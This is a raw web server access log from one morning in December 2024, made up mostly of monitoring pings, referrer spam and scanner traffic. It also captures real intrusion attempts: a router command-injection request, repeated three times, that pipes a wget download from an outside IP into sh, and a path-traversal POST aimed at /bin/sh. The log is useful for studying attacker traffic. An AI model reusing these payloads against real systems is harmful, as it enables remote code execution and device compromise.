77.105.166.134 - - [02/Dec/2024:10:20:42 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:21:04 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:21:04 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:21:06 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:21:06 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:10:21:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [02/Dec/2024:10:21:08 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:21:08 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36"
31.220.1.88 - - [02/Dec/2024:10:21:12 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/Dec/2024:10:22:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:10:23:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:10:24:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:10:25:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:10:26:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.50.16.198 - - [02/Dec/2024:10:26:15 +0100] "GET /cgi-bin/index.cgi HTTP/1.1" 404 322 "-" "-"
77.105.166.134 - - [02/Dec/2024:10:26:51 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:26:52 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:26:54 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:26:54 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:26:56 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:26:56 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:10:27:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [02/Dec/2024:10:27:18 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:27:18 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:27:20 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:27:20 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:27:22 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:27:22 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:10:28:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:10:29:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:10:30:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
122.116.76.100 - - [02/Dec/2024:10:30:33 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
185.191.126.248 - - [02/Dec/2024:10:30:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Dec/2024:10:31:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:10:32:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.1.88 - - [02/Dec/2024:10:32:10 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
77.105.166.134 - - [02/Dec/2024:10:33:02 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:33:02 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:33:04 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:33:04 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:33:06 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:33:06 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:10:33:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [02/Dec/2024:10:33:27 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:33:27 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:33:29 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:33:29 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:33:31 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:33:31 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:10:34:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.35 - - [02/Dec/2024:10:35:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Dec/2024:10:35:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:10:36:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.248 - - [02/Dec/2024:10:36:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Dec/2024:10:37:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.248 - - [02/Dec/2024:10:37:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Dec/2024:10:38:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:10:39:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.50.16.198 - - [02/Dec/2024:10:39:19 +0100] "GET /cgi-bin/index.cgi HTTP/1.1" 404 322 "-" "-"
77.105.166.134 - - [02/Dec/2024:10:39:21 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 OpenWave/97.4.2043.44"
77.105.166.134 - - [02/Dec/2024:10:39:21 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 OpenWave/97.4.2043.44"
77.105.166.134 - - [02/Dec/2024:10:39:23 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:39:23 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:39:25 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:39:25 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:39:47 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:39:47 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:39:49 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:39:49 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:39:51 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:39:51 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:10:40:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
147.185.132.255 - - [02/Dec/2024:10:41:05 +0100] "\x16\x03\x01" 501 318 "-" "-"
147.185.132.255 - - [02/Dec/2024:10:41:05 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [02/Dec/2024:10:41:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.235 - - [02/Dec/2024:10:41:22 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.235 - - [02/Dec/2024:10:41:23 +0100] "\x16\x03\x01" 501 318 "-" "-"
80.82.77.202 - - [02/Dec/2024:10:41:34 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Mobile/15E148 Safari/604.1"
212.91.246.72 - - [02/Dec/2024:10:42:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
14.37.6.143 - - [02/Dec/2024:10:42:23 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
185.191.126.248 - - [02/Dec/2024:10:42:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Dec/2024:10:43:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.1.88 - - [02/Dec/2024:10:43:56 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/Dec/2024:10:44:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [02/Dec/2024:10:44:22 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Mobile/15E148 Safari/604.1"
167.94.138.169 - - [02/Dec/2024:10:44:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.169 - - [02/Dec/2024:10:44:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.169 - - [02/Dec/2024:10:44:43 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.169 - - [02/Dec/2024:10:44:44 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [02/Dec/2024:10:45:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [02/Dec/2024:10:45:33 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:45:34 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:45:36 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:45:36 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:45:38 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:45:38 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:45:57 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:45:57 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:45:59 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:45:59 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:46:01 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:46:01 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:10:46:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.101.142.181 - - [02/Dec/2024:10:46:56 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
147.185.133.228 - - [02/Dec/2024:10:47:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [02/Dec/2024:10:47:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:10:48:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.50.16.198 - - [02/Dec/2024:10:48:28 +0100] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "-"
212.91.246.72 - - [02/Dec/2024:10:49:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:10:50:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:10:51:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [02/Dec/2024:10:51:50 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:51:50 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:51:52 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Herring/95.1.8810.11"
77.105.166.134 - - [02/Dec/2024:10:51:52 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Herring/95.1.8810.11"
77.105.166.134 - - [02/Dec/2024:10:51:54 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:51:54 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:10:52:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [02/Dec/2024:10:52:18 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:52:18 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:52:20 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:52:20 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:52:22 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:52:22 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:10:53:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:10:54:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.50.16.198 - - [02/Dec/2024:10:54:18 +0100] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "-"
212.91.246.72 - - [02/Dec/2024:10:55:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
59.126.32.90 - - [02/Dec/2024:10:55:44 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
